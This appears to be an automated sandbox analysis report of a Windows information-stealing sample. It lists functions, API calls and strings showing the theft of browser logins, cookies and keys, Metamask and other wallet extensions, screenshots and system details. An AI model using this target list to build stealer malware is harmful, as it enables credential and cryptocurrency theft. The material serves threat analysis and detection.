Instruction Fuzzy Hash: 4FC13971B00125ABDB20DF69AC417AB7BA9EF46314F9500AFE884D7382E7388E41C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00413A40, Relevance: 9.1, APIs: 6, Instructions: 127timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,00000000,?,?,00000003), ref: 00413AA6
SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,?,?,00000003), ref: 00413ACF
GetLocalTime.KERNEL32(?,?,00000003), ref: 00413AFA
SystemTimeToFileTime.KERNEL32(?,?,?,00000003), ref: 00413B0A
FileTimeToSystemTime.KERNEL32(?,?,?,00000003), ref: 00413B2A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00413B4C

Part of subcall function 00413670: GetFileInformationByHandle.KERNEL32(?,?,?,00000003,73BCFBD0,00000073), ref: 00413683

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileTime$PointerSystem$HandleInformationLocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 582742055-0
Opcode ID: 8819b5bcf35159362758cb872c541eb4aca84d5add6a01dfd52ddbed9aab13e9
Instruction ID: bd5cdae4d62bf1fec06762cf1ca3d2355f13057f58290dad406622aaf5667070
Opcode Fuzzy Hash: 8819b5bcf35159362758cb872c541eb4aca84d5add6a01dfd52ddbed9aab13e9
Instruction Fuzzy Hash: A2413D72604B409FD324CF29C845B6BB7E4FB88314F044A2EE5A6C6790E779E509CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00402680, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 439fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00433978,?,00000000,00000000,?,00433978,00000000,00403626,00433978,00433978,73B76490,?), ref: 00402842
FindNextFileW.KERNELBASE(00000000,?,?,?,?,?), ref: 0040290F
FindClose.KERNEL32(00000000), ref: 0040291E

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00402A58

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 3541575487-222967699
Opcode ID: d4fe2fd62c51d1cfa657c0d98cde52d800ef80c1e585bdbcfd8e45af17529103
Instruction ID: ef27d2c0634b057d06981e62a263eb777d22113fc9cea62dc4a2f1427e5a6a9d
Opcode Fuzzy Hash: d4fe2fd62c51d1cfa657c0d98cde52d800ef80c1e585bdbcfd8e45af17529103
Instruction Fuzzy Hash: 6CF1D371E102099FDF14DF68C989B9EBBB5FF49304F10822EE405B7281D779AA44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004138F0, Relevance: 1.6, APIs: 1, Instructions: 122fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000003,?,00000001,?,00000000,00000003,?,00000000,004133C6), ref: 00413A18

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fc53cdaea635f3424e5772aeb6b765612b05f65a2cb680dd14ff37f20f725988
Instruction ID: 34d7fa4072abc1ae148679c9a7964203ed4a67b4252bedcc4d41cc25f711eb5a
Opcode Fuzzy Hash: fc53cdaea635f3424e5772aeb6b765612b05f65a2cb680dd14ff37f20f725988
Instruction Fuzzy Hash: 6841DCB1611B018BC764DF2AEA44A67F7E9FB85311B44492FE486C3A00D778F948CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041B72F, Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

f!@, xrefs: 0041B851

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: f!@
API String ID: 0-1230519027
Opcode ID: 3f8dca354f116df7a702222f70d90a560a883af25f0c92192cb6d1e2e9c865f6
Instruction ID: eb7b40cde68853410a4a79adcc2e0ffbcb0bbde1314f21ffe1a320029a4f48b4
Opcode Fuzzy Hash: 3f8dca354f116df7a702222f70d90a560a883af25f0c92192cb6d1e2e9c865f6
Instruction Fuzzy Hash: F261597064030556DB28AA6A88817FFB399EF81B04F14042FE592DB3C0D76D9DC687DE

Uniqueness

Uniqueness Score: -1.00%

Function 004038DC, Relevance: 161.6, APIs: 25, Strings: 66, Instructions: 2302COMMON

Download Yara Rule

Strings

RQv, xrefs: 004073FA
}, xrefs: 00407669
RQZ, xrefs: 00408216
Ms, xrefs: 004080FE
RQ`, xrefs: 00407D10
RQ+, xrefs: 00408045
bl, xrefs: 004085D9
[z, xrefs: 004079F0
|, xrefs: 0040754E
\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih, xrefs: 00407A07
RQA, xrefs: 0040772F
(chrome default), xrefs: 00406941
zt, xrefs: 00407FD1
\Local Extension Settings\mnojpmjdmbbfmejpflffifhffcmidifd, xrefs: 004072F9
\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi, xrefs: 004077AD
\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00406ABE
\Local Extension Settings\aeachknmefphepccionboohckonoeemg, xrefs: 00408242
,y, xrefs: 00407C6F
Yz, xrefs: 00407B42
RQI, xrefs: 00407527
RQX, xrefs: 00407F18
\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig, xrefs: 00407EBB
\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln, xrefs: 00407426
9x, xrefs: 00407A02
+q, xrefs: 00408110
RQ-, xrefs: 00408343
\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 0040709F
7m, xrefs: 004085B4
h6D, xrefs: 004085A7
RQ, xrefs: 00407781
RQ, xrefs: 00407E8F
RQ3, xrefs: 00407E3D
\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 004071CC
Ks, xrefs: 00408250
RQ, xrefs: 00407989
\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid, xrefs: 00406E45
RQh, xrefs: 00407B08
Xr, xrefs: 00407FE3
RQ, xrefs: 00408470
\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc, xrefs: 00406F72
r, xrefs: 0040822B
xt, xrefs: 00408123
\_Files\_Wallet\Metamask , xrefs: 004085B9
fy, xrefs: 004078D5
\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj, xrefs: 00407D8E
\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk, xrefs: 0040836F
3, xrefs: 00408634
\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp, xrefs: 00407FE8
%Temp%\, xrefs: 004085AC
\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne, xrefs: 00407680
\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj, xrefs: 004078DA
\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb, xrefs: 00406BEB
RQ, xrefs: 00407483
\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk, xrefs: 0040849C
\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 00406D18
\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib, xrefs: 00408115
\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 0040698B
\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm, xrefs: 00407C61
RQ9, xrefs: 00407937
\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh, xrefs: 00407B34
\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac, xrefs: 00407553
RQf, xrefs: 0040780A
RQn, xrefs: 00407602
}, xrefs: 004077BB
.y, xrefs: 00407B1D
RQ;, xrefs: 00407C35

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %Temp%\$(chrome default)$3$RQ$RQ+$RQ-$RQ3$RQ9$RQ;$RQA$RQI$RQX$RQZ$RQ`$RQf$RQh$RQn$RQv$RQ$RQ$RQ$RQ$\Local Extension Settings\aeachknmefphepccionboohckonoeemg$\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc$\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp$\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih$\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac$\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk$\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne$\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh$\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi$\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec$\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib$\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad$\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid$\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj$\Local Extension Settings\mnojpmjdmbbfmejpflffifhffcmidifd$\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig$\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm$\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk$\_Files\_Wallet\Metamask $h6D$ r$+q$,y$.y$7m$9x$Ks$Ms$Xr$Yz$[z$bl$fy$xt$zt$|$}$}
API String ID: 0-453211397
Opcode ID: 9a7fb3172e926b764877f69e056f2ba19fe8c7ff58807aec51e2ba6b61d55b05
Instruction ID: b188557e62a463b6ddac4be2a91966895fdbcbf4d6a7cae8ad2a4a706d4db8c5
Opcode Fuzzy Hash: 9a7fb3172e926b764877f69e056f2ba19fe8c7ff58807aec51e2ba6b61d55b05
Instruction Fuzzy Hash: A5131671E101489BDB08DB68DE89BDD7772AF85308F20816DE400B72E5DB7DAB84CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401540, Relevance: 70.6, APIs: 13, Strings: 27, Instructions: 637
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,00000208,?,?,?,?,004338F1,000000FF), ref: 00401575

Part of subcall function 00401220: GetFileAttributesW.KERNEL32(?), ref: 00401234
Part of subcall function 00401220: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401250
Part of subcall function 00401220: GetFileSizeEx.KERNEL32(00000000,?), ref: 00401267
Part of subcall function 00401220: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040128E
Part of subcall function 00401220: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 004012A4
Part of subcall function 00401220: CloseHandle.KERNEL32(00000000), ref: 004012B5
Part of subcall function 00401220: CloseHandle.KERNEL32(00000000), ref: 004012B8

CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401650
CloseHandle.KERNEL32(00000000), ref: 00401662
CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401688
CloseHandle.KERNEL32(00000000), ref: 00401694
CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 004016BA
CloseHandle.KERNEL32(00000000), ref: 004016C6
CopyFileW.KERNEL32(?,?,00000000), ref: 00401B67
CopyFileW.KERNEL32(?,?,00000000), ref: 00401B79
CopyFileW.KERNEL32(?,?,00000000), ref: 00401B8B
CopyFileW.KERNEL32(?,?,00000000), ref: 00401BCC
CopyFileW.KERNEL32(?,?,00000000), ref: 00401BDE
CopyFileW.KERNEL32(?,?,00000000), ref: 00401BF0

Strings

_Brave\default_cookies, xrefs: 004017AF
_Brave\default_webdata, xrefs: 004017BE
Temp, xrefs: 004018E9, 00401939, 00401989, 004019D6, 00401A26, 00401A76, 00401AC6, 00401B13
_Opera\default_cookies, xrefs: 004017E5
_Opera\default_webdata, xrefs: 004017F4
%wS\%wS\Login Data, xrefs: 004015CB
%wS\%wS\Web Data, xrefs: 0040160D
%wS\Local State, xrefs: 0040158B, 00401593
_Opera\default_key, xrefs: 00401803
_Chrome\profile1_logins, xrefs: 0040176A
_Chrome\default_cookies, xrefs: 00401740
_Chrome\profile1_webdata, xrefs: 00401788
%wS\%wS\files_\%wS.db, xrefs: 00401A34, 00401A84, 00401AD4
%wS\%wS\_Files\%wS.db, xrefs: 004018F7, 00401947, 00401997
_Opera\default_logins, xrefs: 004017D6
%wS\%wS\files_\%wS.bin, xrefs: 00401B21
%wS\%wS\Cookies, xrefs: 004015EC
_Chrome\default_key, xrefs: 0040175E
_Chrome\profile1_cookies, xrefs: 00401779
%wS\%wS\_Files\%wS.bin, xrefs: 004019E4
_Brave\default_logins, xrefs: 004017A0
%wS\Opera Stable\Local State, xrefs: 00401586
_Chrome\default_logins, xrefs: 00401731
ab+, xrefs: 00401B3D, 00401BA8
_Chrome\default_webdata, xrefs: 0040174F
_Brave\default_key, xrefs: 004017CD
_Chrome\profile1_key, xrefs: 00401797

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$Copy$CloseCreateHandle$AttributesEnvironmentExpandMappingSizeStringsView
String ID: %wS\%wS\Cookies$%wS\%wS\Login Data$%wS\%wS\Web Data$%wS\%wS\_Files\%wS.bin$%wS\%wS\_Files\%wS.db$%wS\%wS\files_\%wS.bin$%wS\%wS\files_\%wS.db$%wS\Local State$%wS\Opera Stable\Local State$Temp$_Brave\default_cookies$_Brave\default_key$_Brave\default_logins$_Brave\default_webdata$_Chrome\default_cookies$_Chrome\default_key$_Chrome\default_logins$_Chrome\default_webdata$_Chrome\profile1_cookies$_Chrome\profile1_key$_Chrome\profile1_logins$_Chrome\profile1_webdata$_Opera\default_cookies$_Opera\default_key$_Opera\default_logins$_Opera\default_webdata$ab+
API String ID: 1971429607-778859644
Opcode ID: 6c9ad9dfcb2d7f38408d844fd0ed0bc9bf4455e832db2eab4f0744a21cc58483
Instruction ID: 1fa3b4276e83f75601e3db087ca9a903e0bcf12c6bd16eb10e7a476d17db617b
Opcode Fuzzy Hash: 6c9ad9dfcb2d7f38408d844fd0ed0bc9bf4455e832db2eab4f0744a21cc58483
Instruction Fuzzy Hash: 3932E5B1E00208ABEB24DB55CC86FEE7379EB04704F50416AF519B71D1DBB8AA84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD8F, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 339
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,00000000,73AFE730), ref: 0040ADA4
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040AE7E
GetDesktopWindow.USER32(?,?,00000000), ref: 0040AF34
GetWindowRect.USER32 ref: 0040AF47
GetWindowDC.USER32(00000000), ref: 0040AF4E
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0040AF6E
CreateCompatibleDC.GDI32(00000000), ref: 0040AF77
CreateDIBSection.GDI32(?,?,00000001,?,00000000,00000000), ref: 0040AFF8
DeleteDC.GDI32(00000000), ref: 0040B00C
DeleteDC.GDI32(?), ref: 0040B011
GdiplusShutdown.GDIPLUS(?), ref: 0040B016
SaveDC.GDI32(00000000), ref: 0040B01D
SelectObject.GDI32(00000000,?), ref: 0040B029
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0040B046
RestoreDC.GDI32(00000000,00000000), ref: 0040B04E
DeleteDC.GDI32(00000000), ref: 0040B05B
DeleteDC.GDI32(?), ref: 0040B060
GdipAlloc.GDIPLUS(00000010), ref: 0040B064
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040B089
GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0040B0EC
GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 0040B112

Strings

%Temp%\, xrefs: 0040AE40
image/jpeg, xrefs: 0040B124
\files_\screenshot.jpg, xrefs: 0040AE50

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: DeleteGdip$CreateWindow$EncodersEnvironmentExpandImageStrings$AllocBitmapCapsCompatibleDesktopDeviceFromGdiplusObjectRectRestoreSaveSectionSelectShutdownSize
String ID: %Temp%\$\files_\screenshot.jpg$image/jpeg
API String ID: 2763447572-171859710
Opcode ID: 510f22d190e77b2656e4dba0ddc45a63b4a3016046c0887c02990e7d4ad3c330
Instruction ID: d8e50c588ea01944bb44ef309635bae0b9a46b09829a39c395f9584097d9e9ea
Opcode Fuzzy Hash: 510f22d190e77b2656e4dba0ddc45a63b4a3016046c0887c02990e7d4ad3c330
Instruction Fuzzy Hash: 90C19C71D002199BDB10DFA4CD89BAEBBB5FF48300F10416AE509B7290DB799A81CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00402E20, Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 229
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00402EB7
RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00402F52
RegEnumKeyExW.KERNEL32 ref: 00402F74
RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,00020119,?), ref: 00402FCC
RegQueryValueExW.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00402FFA
RegQueryValueExW.KERNEL32(?,DisplayVersion,00000000,?,?,?), ref: 00403035
RegCloseKey.ADVAPI32(?), ref: 00403062
RegEnumKeyExW.KERNEL32 ref: 0040308B
RegCloseKey.KERNEL32(?,?,?,00000000,00020119,?), ref: 0040309F

Strings

DisplayName, xrefs: 00402FF2
DisplayVersion, xrefs: 0040302D
%Temp%\, xrefs: 00402E77
\_Files\_Information.txt, xrefs: 00402E55
%wS , xrefs: 00403007
[ %wS ], xrefs: 00403042
a+,ccs=UTF-16LE, xrefs: 00402F9F

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenQueryValue$EnvironmentExpandStrings
String ID: [ %wS ]$%Temp%\$%wS $DisplayName$DisplayVersion$\_Files\_Information.txt$a+,ccs=UTF-16LE
API String ID: 3180806605-3129064799
Opcode ID: eaaa65728a113665310eef6b36260f63c9922fdd03313e79a1d1aa83e018b5ed
Instruction ID: 8a04d3a951964e5eee5b955ef251e15adcbcf34c8aaab6d5d1baedac81cc999c
Opcode Fuzzy Hash: eaaa65728a113665310eef6b36260f63c9922fdd03313e79a1d1aa83e018b5ed
Instruction Fuzzy Hash: DB71E271A00108ABEB14DB60DD8AFEEB77CEB45304F10413AF514F72D5DB79AA448BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA92, Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 207
registrysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 0040AAA9
RegCloseKey.KERNEL32(?,?,73BCF9C0,00000000), ref: 0040AAB4
RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,?,?,?,73BCF9C0,00000000), ref: 0040AAE8
RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 0040AB09
RegCloseKey.ADVAPI32(?,?,?,?,?,73BCF9C0,00000000), ref: 0040AB0E
GetUserNameW.ADVAPI32(?,?), ref: 0040AB22
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,?,?,?,?,?,73BCF9C0,00000000), ref: 0040ABBD
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,73BCF9C0,00000000), ref: 0040AC06
Sleep.KERNEL32(?,?,?,?,?,73BCF9C0,00000000), ref: 0040AC43
GetFileAttributesW.KERNEL32(00000000), ref: 0040AC5A
RemoveDirectoryW.KERNEL32(00000000), ref: 0040AC72

Strings

ProcessorNameString, xrefs: 0040AB01
%Temp%\, xrefs: 0040AB98
ProductName, xrefs: 0040AAA1
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0040AADE

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseDirectoryQueryValue$AttributesCreateEnvironmentExpandFileNameOpenRemoveSleepStringsUser
String ID: %Temp%\$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$ProductName
API String ID: 3957966660-2761025811
Opcode ID: 52929fb7d35d7b340b3713fda41224da8122b9a10d728832a0caabdc2f9b3651
Instruction ID: 673894bbe529e171f790d670c2fae652baaff4485569ff70b1b04ba6d1552cfb
Opcode Fuzzy Hash: 52929fb7d35d7b340b3713fda41224da8122b9a10d728832a0caabdc2f9b3651
Instruction Fuzzy Hash: DB61C6B1A00208ABEB04DBA4DD89FDE7775BF05304F10413AF105B72D1DB79AA94CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00413670, Relevance: 18.2, APIs: 12, Instructions: 208
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileInformationByHandle.KERNEL32(?,?,?,00000003,73BCFBD0,00000073), ref: 00413683
GetFileSize.KERNEL32(?,00000000), ref: 00413706
SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00413724
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00413735
SetFilePointer.KERNELBASE(?,00000024,00000000,00000000), ref: 00413742
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00413753
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00413776
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00413787

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: 61f9b29862b34706fbaf0c84bfd94dc2d6485c59ef157a9d25be3348fb26b658
Instruction ID: 42c9301b02b59833fe73ebc2971b27293901998bbd8a8571cf27d89f62cdcd71
Opcode Fuzzy Hash: 61f9b29862b34706fbaf0c84bfd94dc2d6485c59ef157a9d25be3348fb26b658
Instruction Fuzzy Hash: 40618DB16047046FE328CE28CC91B6BB7E8EBC4704F45492EFA56D7380D678ED448B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042FAC3, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0042F80A: CreateFileW.KERNEL32(00000000,00000000,?,0042FB6C,?,?,00000000,?,0042FB6C,00000000,0000000C), ref: 0042F827

GetLastError.KERNEL32 ref: 0042FBD7
__dosmaperr.LIBCMT ref: 0042FBDE
GetFileType.KERNEL32(00000000), ref: 0042FBEA
GetLastError.KERNEL32 ref: 0042FBF4
__dosmaperr.LIBCMT ref: 0042FBFD
CloseHandle.KERNEL32(00000000), ref: 0042FC1D
CloseHandle.KERNEL32(00000000), ref: 0042FD6A
GetLastError.KERNEL32 ref: 0042FD9C
__dosmaperr.LIBCMT ref: 0042FDA3

Strings

H, xrefs: 0042FD28

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ab4a2fa7039de01f88b924d2acb9f6bfc6cd6c794438e29297dbe0d97afc0de4
Instruction ID: 25dcac02debeb81dbd6a6d198667d1cc5539ba691dcfbe9b2468b110224c6869
Opcode Fuzzy Hash: ab4a2fa7039de01f88b924d2acb9f6bfc6cd6c794438e29297dbe0d97afc0de4
Instruction Fuzzy Hash: 27A13732B141289FCF199F68EC517AE7BB0AF06318F94017EE801AF391C739991AC759

Uniqueness

Uniqueness Score: -1.00%

Function 00428D30, Relevance: 13.8, APIs: 9, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19e9a0dcaf4542840d3d190d8256635f9601c5f96d698ed50c24fdf52c4dac5
Instruction ID: 58b0fd4a9d56e6ef3f430f92bc8ab8c2edc3e5391ccf52cd0c66086c8b9a9c5e
Opcode Fuzzy Hash: f19e9a0dcaf4542840d3d190d8256635f9601c5f96d698ed50c24fdf52c4dac5
Instruction Fuzzy Hash: 5CC1E4B0B04229AFDF15DF99E940BAEBBB1AF49304F44405EE5049B392CB799D41CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0041F137, Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0041F2BF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F2DB
__allrem.LIBCMT ref: 0041F2F2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F310
__allrem.LIBCMT ref: 0041F327
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F345

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: afe13e7a46b6ef11c01009a8e5668f2afd255309c39c946028f577abb9d276b4
Instruction ID: d0314f91818ed0267d4fd51c4fbfc945a5535070cb91a0e9f51d4e5c0fe62911
Opcode Fuzzy Hash: afe13e7a46b6ef11c01009a8e5668f2afd255309c39c946028f577abb9d276b4
Instruction Fuzzy Hash: CA811972700716ABE720AE69DC41B9B73A8AF44324F14423FF815D6381EB78DD86879D

Uniqueness

Uniqueness Score: -1.00%

Function 00429F52, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00437808), ref: 00429FBC
_free.LIBCMT ref: 00429FAA

Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00

_free.LIBCMT ref: 0042A176

Strings

W. Europe Standard Time, xrefs: 0042A02B
W. Europe Daylight Time, xrefs: 0042A05A

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: W. Europe Daylight Time$W. Europe Standard Time
API String ID: 2155170405-986674615
